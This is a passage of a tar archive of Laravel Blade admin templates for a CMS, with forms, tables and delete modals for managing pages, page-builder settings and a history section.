__('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes" {{ $page_builder->breadcrumb_status == 'yes' ? 'selected' : '' }}>{{ __('content.yes') }}</option> <option value="no" {{ $page_builder->breadcrumb_status == 'no' ? 'selected' : '' }}>{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($page_builder->custom_breadcrumb_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/page_builder/breadcrumb/'.$page_builder->custom_breadcrumb_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> @if ($page_builder->page_name == 'service-category-index' || $page_builder->page_name == 'team-category-index') <input name="meta_title" type="hidden"> @else <div class="col-md-12"> <div class="form-group"> <label for="meta_title">{{ __('content.meta_title') }} </label> <input type="text" name="meta_title" class="form-control" id="meta_title" value="{{ $page_builder->meta_title }}"> </div> </div> @endif <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control" value="{{ $page_builder->meta_description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control" rows="3">{{ $page_builder->meta_keyword }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $page_builder->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $page_builder->status === 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $page_builder->status === 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="defaultPageModal{{ $page_builder->id }}" tabindex="-1" role="dialog" aria-labelledby="defaultPageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="defaultPageModalCenterTitle">{{ __('content.update') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.return_to_default_page_settings') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('page-builder.default_page_update', $page_builder->id) }}" method="POST"> @method('PATCH') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_apply') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page/create.blade.php�������������������������������������������������������������������0000644�����������������00000023271�14765366573�0012762 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_page') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('page.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea id="summernote" name="description" class="form-control"></textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control"></textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes">{{ __('content.yes') }}</option> <option value="no">{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 600 x 400)(.svg, .png, .jpg, .jpeg)</label> <input id="image" name="section_image" type="file" class="form-control-file"> <small id="image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page/index.blade.php��������������������������������������������������������������������0000644�����������������00000023115�14765366573�0012623 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.pages') }}</h6> <div> <a href="{{ url('admin/page/create') }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_page') }}</a> </div> </div> @if (count($pages) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('page.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.url') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($pages); $asc=0; @endphp @foreach ($pages as $page) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $page->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $page->title }}</td> <td> <div> <div class="form-group"> <input type="text" value="{{ url('/'.$page_builder->page_uri.'/'.$page->page_slug) }}" id="copyImageLink{{ $page->id }}"> <br> <button class="btn btn-success mt-3" onclick="copyImageLink({{ $page->id }})">{{ __('content.copy_url') }}</button> </div> </div> </td> <td>{{ $page->order }}</td> <td> @if ($page->status == "published") <span class="badge badge-pill badge-success">{{ __('content.published') }}</span> @else <span class="badge badge-pill badge-danger">{{ __('content.draft') }}</span> @endif </td> <td> <div> <a href="{{ route('page.edit', $page->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $page->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $page->id }}" tabindex="-1" role="dialog" aria-labelledby="blogModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="blogModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('page.destroy', $page->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page/edit.blade.php���������������������������������������������������������������������0000644�����������������00000042533�14765366573�0012446 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_page') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('page.update', $page->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" value="{{ $page->title }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea id="summernote" name="description" class="form-control">@php echo html_entity_decode($page->description); @endphp</textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="title" name="meta_description" type="text" class="form-control" value="{{ $page->meta_description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control">{{ $page->meta_keyword }}</textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes" {{ $page->breadcrumb_status == 'yes' ? 'selected' : '' }}>{{ __('content.yes') }}</option> <option value="no" {{ $page->breadcrumb_status == 'no' ? 'selected' : '' }}>{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($page->custom_breadcrumb_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/blog/breadcrumb/'.$page->custom_breadcrumb_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 600 x 400) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($page->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/page/'.$page->section_image) }}" alt="blog image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($page->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $page->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="image_status" class="col-form-label">{{ __('content.image_status') }}</label> <select class="form-control" name="image_status" id="image_status"> <option value=show" selected>{{ __('content.select_your_option') }}</option> <option value="show" {{ $page->image_status == "show" ? 'selected' : '' }}>{{ __('content.show') }}</option> <option value="hide" {{ $page->image_status == "hide" ? 'selected' : '' }}>{{ __('content.hide') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $page->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $page->status == "published" ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $page->status == "draft" ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $page->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('page.destroy_image', $page->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/history/create.blade.php�������������������������������������������������������0000644�����������������00000065112�14765366573�0015376 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.history') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('history.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/history-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#historySectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#historyModal">+ {{ __('content.add_history') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('history.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.history_date') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $item->history_date }}</td> <td>@php echo html_entity_decode($item->title); @endphp</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('history.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="featureModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="featureModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('history.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="historySectionModal" tabindex="-1" role="dialog" aria-labelledby="historySectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="historySectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('history-section.update', $item_section->id) }}" method="POST"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#workProcessSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="historySectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="historySectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="historySectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('history-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('history-section.store') }}" method="POST"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') 